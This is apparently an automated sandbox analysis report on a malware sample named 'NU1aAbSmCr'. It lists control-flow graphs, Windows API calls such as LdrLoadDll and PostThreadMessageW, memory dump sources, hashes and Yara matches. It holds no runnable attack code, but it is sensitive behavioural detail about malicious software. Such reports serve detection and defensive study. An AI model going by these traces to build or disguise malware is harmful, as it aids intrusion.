                                                      • Instruction ID: 4b20f16f18310b665374c45b2988cf8f43e60c0568f672371900aad49a75fadf
                                                      • Opcode Fuzzy Hash: bf77d612120750672ec224ac023a9c439b741715aa7d62bc51de94c9f3e82804
                                                      • Instruction Fuzzy Hash: BE2105B59002089FDF10CF9AD484AEEBBF4EB48310F14802AE918A7311D374A954CFA0

                                                      Control-flow Graph
                                                      • Basic blocks: 1124 f9d581-f9d61c (DuplicateHandle); 1125 f9d61e-f9d624; 1126 f9d625-f9d642
                                                      • Edges: 1124->1125, 1124->1126, 1125->1126
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00F9D54E,?,?,?,?,?), ref: 00F9D60F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1349983281.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f90000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 20fe107790df611e0325de9067d395d0f8ee8c831e50907bd2f58f80bf3bc6bf
                                                      • Instruction ID: decb1f3085185a9e45be3bed3589a3a6d756c9d7c39a405d5eb5e287f54ae86f
                                                      • Opcode Fuzzy Hash: 20fe107790df611e0325de9067d395d0f8ee8c831e50907bd2f58f80bf3bc6bf
                                                      • Instruction Fuzzy Hash: 7221E4B5D002489FDB10CF9AD584AEEBBF4FB48320F14842AE958A7351D379A954CFA1

                                                      Control-flow Graph
                                                      • Basic blocks: 1135 6ed0088-6ed1dfa (PostMessageW); 1137 6ed1dfc-6ed1e02; 1138 6ed1e03-6ed1e17
                                                      • Edges: 1135->1137, 1135->1138, 1137->1138
                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 06ED1DED
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1371935689.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6ed0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: MessagePost
                                                      • String ID:
                                                      • API String ID: 410705778-0
                                                      • Opcode ID: c6b1bdcb3a48371f5ee5fe504722f3f29c084ea41ee58a977facd35f6f4c5435
                                                      • Instruction ID: 6118f7ad723e86dfaa37dc183f619fe467dbb6568a632510e44a7a7c4c138cdf
                                                      • Opcode Fuzzy Hash: c6b1bdcb3a48371f5ee5fe504722f3f29c084ea41ee58a977facd35f6f4c5435
                                                      • Instruction Fuzzy Hash: 6F1103B5804348DFDB60DF9AD845BEEBBF8EB48310F108459E958B7200D375A944CFA5

                                                      Control-flow Graph
                                                      • Basic blocks: 1129 f9b298-f9b2d8; 1130 f9b2da-f9b2dd; 1131 f9b2e0-f9b30b (GetModuleHandleW); 1132 f9b30d-f9b313; 1133 f9b314-f9b328
                                                      • Edges: 1129->1130, 1129->1131, 1130->1131, 1131->1132, 1131->1133, 1132->1133
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 00F9B2FE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1349983281.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f90000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: a1bfa6fc152cfe2ab8dca7a1522cbebb584e41eb99d79d334b9ce3d3526d2151
                                                      • Instruction ID: b6a2cd46762603ea4d866bc0d410edf5f5c51dc53c11ddee3f11e566b3c5adc7
                                                      • Opcode Fuzzy Hash: a1bfa6fc152cfe2ab8dca7a1522cbebb584e41eb99d79d334b9ce3d3526d2151
                                                      • Instruction Fuzzy Hash: 1811E0B5C006498FDB20CF9AD544BDEFBF4EF88724F10842AD859A7210D375A545CFA5
                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 06ED1DED
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1371935689.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6ed0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: MessagePost
                                                      • String ID:
                                                      • API String ID: 410705778-0
                                                      • Opcode ID: e6eb48886ca82160392292fe9e45c37a297f6f696a5c990d804d54f365f1d05a
                                                      • Instruction ID: 8ad49cd69f5ca491b2195ed1e4e00fa39107e1c6fe9376a26f2420a4b5d76001
                                                      • Opcode Fuzzy Hash: e6eb48886ca82160392292fe9e45c37a297f6f696a5c990d804d54f365f1d05a
                                                      • Instruction Fuzzy Hash: 991122B58043499FDB20CF99D844BDEFFF8EB48324F20841AE898A7240C375A644CFA5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1349411800.0000000000C8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C8D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_c8d000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 952f6bd382aa531e9a0ac2617bf204ecaa3d591a9da024565bf2da711d66074f
                                                      • Instruction ID: 33c77b2f889f223ca9b9376aefa69ba22a0d0d86064a9ee670b44b3099dd3e58
                                                      • Opcode Fuzzy Hash: 952f6bd382aa531e9a0ac2617bf204ecaa3d591a9da024565bf2da711d66074f
                                                      • Instruction Fuzzy Hash: AB21F5B1504240DFDB15EF14D9C0F26BF65FB9831CF24C56AE80A0B296C336D956CBA6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1349411800.0000000000C8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C8D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_c8d000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3c2e565c4a4647934c3ffc44488a548fafdbbeba4e91af3a3c90a576aa06e122
                                                      • Instruction ID: f29356fc7c6cdff12dafd3a27061cc84a09258234e2ea5aebedd225be3509ab1
                                                      • Opcode Fuzzy Hash: 3c2e565c4a4647934c3ffc44488a548fafdbbeba4e91af3a3c90a576aa06e122
                                                      • Instruction Fuzzy Hash: 7421F871504304DFDB05EF50D9C0B16BB65FBD8328F24C56DE90A0B296C376E856CBA6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1349467277.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_c9d000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 89444a197663f1b44d5602254eb03416fc9ccae902453e589f7820aaff221e00
                                                      • Instruction ID: 51c75287a8fb5607aedb7b6618d67efa89044447bd973c8f894fd379592c176b
                                                      • Opcode Fuzzy Hash: 89444a197663f1b44d5602254eb03416fc9ccae902453e589f7820aaff221e00
                                                      • Instruction Fuzzy Hash: 8C21FF71604300DFDF14DF24D9C8B26BBA5FB88314F20C5ADE84A5B296C33AD857CA62
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1349467277.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_c9d000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3ce7a1da7fd7d3b03bced9cb5dfa5739f40deb0c49f5ccce317cbfc51b0b0d9c
                                                      • Instruction ID: 85b4d19cee812aaeb4799d92ef30a05dcd481ad2d27905eef7c9564dcd7bd05b
                                                      • Opcode Fuzzy Hash: 3ce7a1da7fd7d3b03bced9cb5dfa5739f40deb0c49f5ccce317cbfc51b0b0d9c
                                                      • Instruction Fuzzy Hash: 70219F755093C08FCB02CF24D994715BF71EB46314F28C5EAD84A8F6A7C33A980ACB62
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1349411800.0000000000C8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C8D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_c8d000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                                      • Instruction ID: 2868cfd2b605e17406769c0e1edb2ac92af2c295f4bc60c021cc0f76dfb565b7
                                                      • Opcode Fuzzy Hash: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                                      • Instruction Fuzzy Hash: CB11D376504240DFCB15DF10D5C4B16BF71FB94328F24C6A9D84A0B656C33AE95ACBA1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1349411800.0000000000C8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C8D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_c8d000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                                      • Instruction ID: bd81352d74047f46a1f8324bfc39700c69c6973d03948da1640b2a303cd3037b
                                                      • Opcode Fuzzy Hash: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                                      • Instruction Fuzzy Hash: 1111E6B6504280DFCB15DF10D5C4B16BF71FB94318F24C6AAD84A0B656C336D95ACBA1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1349411800.0000000000C8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C8D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_c8d000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6b095c7a2106bea691c480f2ad2d83831f8f8f8b66937372e0e38597e96cc5e7
                                                      • Instruction ID: 99c331b66c17d1d86f70f4c1565aa535ca4fa004aa05a7e25bb07b785eb064b5
                                                      • Opcode Fuzzy Hash: 6b095c7a2106bea691c480f2ad2d83831f8f8f8b66937372e0e38597e96cc5e7
                                                      • Instruction Fuzzy Hash: BA01DB310083449BE724AB66CD84B66FBD8DF41328F14C469ED5A4E1C6D7799D40C776
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1349411800.0000000000C8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C8D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_c8d000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7686634df213eb26775efa7fdefd30e2166c07ce7b0593dc2ee900ec42761bb2
                                                      • Instruction ID: 258e99f8da1c0f98b611f195f393d6f2af5c7fe27516e40116fd0bb98442f9c9
                                                      • Opcode Fuzzy Hash: 7686634df213eb26775efa7fdefd30e2166c07ce7b0593dc2ee900ec42761bb2
                                                      • Instruction Fuzzy Hash: FEF0C231004344AEE7109A16C884B62FFD8EB90338F18C45AED594E286C3799C44CB71
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1371935689.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6ed0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fd9d43cf9d350e2290026c6dfa1e37a7fe5a1fb069082bd31d2bdda41001816f
                                                      • Instruction ID: c5d11bc1adc8f003db27362c4e184b74142282497b9acb550599e47c35cc21db
                                                      • Opcode Fuzzy Hash: fd9d43cf9d350e2290026c6dfa1e37a7fe5a1fb069082bd31d2bdda41001816f
                                                      • Instruction Fuzzy Hash: 74D1AC70B007009FEBA5DB75C950BAEB7E6AF8A700F14846DD116CB291DF35E902CB92
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365378642.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4f50000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 915cc0e65f080ec2bd480e73d73027b7e1728099a9e94646b5a7e09a69c42168
                                                      • Instruction ID: 4fcde1c9d9786f959e2e4d2b6262c4989030922e49044691cc75cb2e8acc133b
                                                      • Opcode Fuzzy Hash: 915cc0e65f080ec2bd480e73d73027b7e1728099a9e94646b5a7e09a69c42168
                                                      • Instruction Fuzzy Hash: B11294B0C917458BE714CF65E8CC1893BB1BB45318FD04A0AD2612B2E9DFB8956BDF44
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1349983281.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f90000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fb5c6aaee2508092b2a6d2496ba57a1c9319de35f55d9629c43e9c71d9855c7e
                                                      • Instruction ID: a261b641a12c7bff9246ba9904bb9c4dd404a925eb713ff98878e6be2d26d152
                                                      • Opcode Fuzzy Hash: fb5c6aaee2508092b2a6d2496ba57a1c9319de35f55d9629c43e9c71d9855c7e
                                                      • Instruction Fuzzy Hash: 48A18C32E002098FDF05DFB5C98059EB7B2FF85310B25857AE906AB265DB35ED1ADB40
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365378642.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4f50000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d73590d80dceca73fabfd2fabb93eb35cda7f88552ab2ce679c6d8dfacf978af
                                                      • Instruction ID: de43d6f1cdac22a50e381f3d74d82d922ca193cc49dac46b57b9d3963e8c8bdc
                                                      • Opcode Fuzzy Hash: d73590d80dceca73fabfd2fabb93eb35cda7f88552ab2ce679c6d8dfacf978af
                                                      • Instruction Fuzzy Hash: 3FC105B0C917458BEB10CF29E8CC1893BB1BB85324F904A0AD1616B2E9DFB4946BDF54
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1349983281.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f90000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1c0e3c7a03f0646a760503778630c3c9c2adf62aa0d63c651768640f7573e9f3
                                                      • Instruction ID: 09d784c378b7854d7a17b64faee9c0fd3250f111f99061a01ff91a88c9e5082f
                                                      • Opcode Fuzzy Hash: 1c0e3c7a03f0646a760503778630c3c9c2adf62aa0d63c651768640f7573e9f3
                                                      • Instruction Fuzzy Hash: B561285BA9591487FF5404AB5C657D623C1E3BB32CF109709F22C9A3D2F854F8C3925A

                                                      Execution Graph

                                                      Execution Coverage:1.2%
                                                      Dynamic/Decrypted Code Coverage:4.6%
                                                      Signature Coverage:7.9%
                                                      Total number of Nodes:152
                                                      Total number of Limit Nodes:12

                                                      Control-flow Graph
                                                      • Basic blocks: 84 417ad3-417aef; 85 417af7-417afc; 86 417af2 (call 42f733); 87 417b02-417b10 (call 42fd33); 88 417afe-417b01; 91 417b20-417b31 (call 42e0b3); 92 417b12-417b1d (call 42ffd3); 97 417b33-417b47 (LdrLoadDll); 98 417b4a-417b4d
                                                      • Edges: 84->85, 84->86, 85->87, 85->88, 86->85, 87->91, 87->92, 91->97, 91->98, 92->91, 97->98
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417B45
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821048829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NU1aAbSmCr.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: 417d38369877b74250db912e8e6bb13c15c1812a8033f171d704f8760a4bd8cb
                                                      • Instruction ID: d12cc20611dbccb473ffbd96b21e27a4a6f02d97c40ee013a5ef017d1ba0565a
                                                      • Opcode Fuzzy Hash: 417d38369877b74250db912e8e6bb13c15c1812a8033f171d704f8760a4bd8cb
                                                      • Instruction Fuzzy Hash: F4015EB1E0420DABDB10DAA1DD42FDEB378AB54308F4041AAEA0897240F674EB498B95

                                                      Control-flow Graph
                                                      • Basic blocks: 105 42c9b3-42c9ef (call 404913, call 42dbb3, NtClose)
                                                      • Edges: none (single block)
                                                      APIs
                                                      • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C9EA
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821048829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NU1aAbSmCr.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: 4d70b07d015640436ff79a030af5fda1140dbc98913e55b2ed826efc0772edf8
                                                      • Instruction ID: c3916fea0772bbdbc0279c8410de1fff15ffbf804abd9fb5993c11b118a3ee5e
                                                      • Opcode Fuzzy Hash: 4d70b07d015640436ff79a030af5fda1140dbc98913e55b2ed826efc0772edf8
                                                      • Instruction Fuzzy Hash: 61E086716042147BD620FA5ADC02F9B776CDFC5714F40445AFE0867242C7747A0187F4
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 5eb9814fd03e2a09ce451630871a4541044afca3725e6102394a06c7b8c539b8
                                                      • Instruction ID: 119f454aec3e1f0769b613b9e84411ff55839c1fcea223a15ef3740b23d64b2b
                                                      • Opcode Fuzzy Hash: 5eb9814fd03e2a09ce451630871a4541044afca3725e6102394a06c7b8c539b8
                                                      • Instruction Fuzzy Hash: E490026160240003410575584814657401E97E0201B55C121F5018690EC52589927225
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 7c851b553deff2e51e687cfeb96a88923f544fd0e06972dd9bcb4ebfab49ed86
                                                      • Instruction ID: 49bc0e817323dcb92121d463c592645275d51ac61b7b22abb9bbe65dbf089442
                                                      • Opcode Fuzzy Hash: 7c851b553deff2e51e687cfeb96a88923f544fd0e06972dd9bcb4ebfab49ed86
                                                      • Instruction Fuzzy Hash: 2090023160140413D11175584904747001D97D0241F95C512B4428658ED6568A53B221
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: d5455b5eb3dbf81eda3393412918eb38faed49a39e2ab225edd05a96683f64d9
                                                      • Instruction ID: a5faf4f3e1ada70566cc8fd050fd4045ae70dadfc26c755d57589f6cf05efb5e
                                                      • Opcode Fuzzy Hash: d5455b5eb3dbf81eda3393412918eb38faed49a39e2ab225edd05a96683f64d9
                                                      • Instruction Fuzzy Hash: 2E90023160148802D1107558880478B001997D0301F59C511B8428758EC69589927221
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: b390988428a2ba8ea373c9417743876ba929bddfb09a57d115ea201bfda7e2cd
                                                      • Instruction ID: 6b0abfa080f58805b4afb7f003ea9affff3d96b21fa665befba6a9d8f8c98f6a
                                                      • Opcode Fuzzy Hash: b390988428a2ba8ea373c9417743876ba929bddfb09a57d115ea201bfda7e2cd
                                                      • Instruction Fuzzy Hash: 9A900231A0550402D10075584914747101997D0201F65C511B4428668EC7958A5276A2

                                                      APIs
                                                      • PostThreadMessageW.USER32(41392M9L,00000111,00000000,00000000), ref: 0041438A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821048829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NU1aAbSmCr.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: 41392M9L$41392M9L
                                                      • API String ID: 1836367815-3081274516
                                                      • Opcode ID: 06fda434b8ccff3761ff56cbb26a12cdefb02e71861326aa55445cdbb95d6234
                                                      • Instruction ID: 42976dbd2dceaa1e0a977a924473439363ed6aa6ab46c42b953b71c348218e9c
                                                      • Opcode Fuzzy Hash: 06fda434b8ccff3761ff56cbb26a12cdefb02e71861326aa55445cdbb95d6234
                                                      • Instruction Fuzzy Hash: 3F0104B2D0021C7ADB01AAE19C82DEFBB7CEF40798F448069FA04A7141D5788F068BB1

                                                      APIs
                                                      • PostThreadMessageW.USER32(41392M9L,00000111,00000000,00000000), ref: 0041438A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821048829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NU1aAbSmCr.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: 41392M9L$41392M9L
                                                      • API String ID: 1836367815-3081274516
                                                      • Opcode ID: 639504a2a278ac61002ba711ce2f554ccfa311799b31f556876d0b8b43b30756
                                                      • Instruction ID: 3fa6e5ee1cf9f8121619ab0affa830f4b3690b6f4062a0325252bb4d0d93531c
                                                      • Opcode Fuzzy Hash: 639504a2a278ac61002ba711ce2f554ccfa311799b31f556876d0b8b43b30756
                                                      • Instruction Fuzzy Hash: 8F01D6B2D4121C7ADB11AAE19C82DEFBB7CDF41798F448069FA14A7141D5788F068BB1

Control-flow Graph
• control_flow_graph 31 4142df-4142ff 32 414301 31->32 33 414359-41435c call 425233 31->33 34 414361-41437d 32->34 35 414303-41430a 32->35 33->34 37 41439d-4143a3 34->37 38 41437f-41438e PostThreadMessageW 34->38 38->37 39 414390-41439a 38->39 39->37
                                                      APIs
                                                      • PostThreadMessageW.USER32(41392M9L,00000111,00000000,00000000), ref: 0041438A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821048829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NU1aAbSmCr.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: 41392M9L$41392M9L
                                                      • API String ID: 1836367815-3081274516
                                                      • Opcode ID: b5455ddb34965fc3d5f9ad89c7ac4ae6f5a50f54c0de38243e1a5172f6207e5a
                                                      • Instruction ID: 735d4efb0f620f6208f1c147f2a007fbd04646f5a27583c5ced9a2cb2e41a2ff
                                                      • Opcode Fuzzy Hash: b5455ddb34965fc3d5f9ad89c7ac4ae6f5a50f54c0de38243e1a5172f6207e5a
                                                      • Instruction Fuzzy Hash: 1001FC72A4115C77CB118E949D829EEBB6CEE81758B44C0EAEE14DB201E7294E0687E2

Control-flow Graph
• control_flow_graph 40 41430b-41437d 42 41439d-4143a3 40->42 43 41437f-41438e PostThreadMessageW 40->43 43->42 44 414390-41439a 43->44 44->42
                                                      APIs
                                                      • PostThreadMessageW.USER32(41392M9L,00000111,00000000,00000000), ref: 0041438A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821048829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NU1aAbSmCr.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: 41392M9L$41392M9L
                                                      • API String ID: 1836367815-3081274516
                                                      • Opcode ID: 35b59af5c047f9fb8afd9390d102ded51f0e0ac9b59e256273bac81645503566
                                                      • Instruction ID: ba8821999e5b2222220c20eb37ec5ddfee11338e0595fbe07a32eae1e8a502a6
                                                      • Opcode Fuzzy Hash: 35b59af5c047f9fb8afd9390d102ded51f0e0ac9b59e256273bac81645503566
                                                      • Instruction Fuzzy Hash: 06E08632B4010C759B1186D49C83DFFB77CEE85755B118067EE54A3100D1244D0647A6

Control-flow Graph
• control_flow_graph 45 42cd23-42cd64 call 404913 call 42dbb3 RtlFreeHeap
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CD5F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821048829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NU1aAbSmCr.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID: $hA
                                                      • API String ID: 3298025750-1828366215
                                                      • Opcode ID: 11a1ee925e275e06544c5406db7f8856123b0f17c84fa89a6084066825a6a8e4
                                                      • Instruction ID: a86032f8d3a2c2e5ac1b48a75f49b08fe8d08fe9d8143af625c64d2ce33d2964
                                                      • Opcode Fuzzy Hash: 11a1ee925e275e06544c5406db7f8856123b0f17c84fa89a6084066825a6a8e4
                                                      • Instruction Fuzzy Hash: 25E092B16042047BD610EE59DC41F9F37ACEFC9750F000019FE08A7241C670BA108BF8

Control-flow Graph
• control_flow_graph 100 42ccd3-42cd17 call 404913 call 42dbb3 RtlAllocateHeap
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(?,0041E93E,?,?,00000000,?,0041E93E,?,?,?), ref: 0042CD12
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821048829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NU1aAbSmCr.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 6d2fd3d9d8fa43bb4c96a5e86d46db2439ffdec3bfb4a8501485fe68fbf598b1
                                                      • Instruction ID: 8ac62094bed881341e935ba2056062aaf7a5c0d313ce0ce43bd6ed86aa1799c4
                                                      • Opcode Fuzzy Hash: 6d2fd3d9d8fa43bb4c96a5e86d46db2439ffdec3bfb4a8501485fe68fbf598b1
                                                      • Instruction Fuzzy Hash: E9E06DB16042187BD610EE59DC41F9B37ADEFC8714F004059F908A7242D7B0BE108AB8

Control-flow Graph
• control_flow_graph 110 42cd73-42cdac call 404913 call 42dbb3 ExitProcess
                                                      APIs
                                                      • ExitProcess.KERNEL32(?,00000000,00000000,?,5FB0DE08,?,?,5FB0DE08), ref: 0042CDA7
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821048829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
